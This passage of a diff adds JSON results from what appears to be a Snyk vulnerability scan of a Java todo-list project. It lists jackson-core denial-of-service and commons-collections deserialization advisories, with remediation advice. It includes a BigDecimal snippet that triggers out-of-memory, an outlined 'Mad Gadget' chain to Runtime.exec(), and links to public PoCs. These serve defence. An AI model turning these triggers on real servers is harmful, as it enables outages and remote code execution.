"Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-core@2.8.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-core@2.7.7" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + 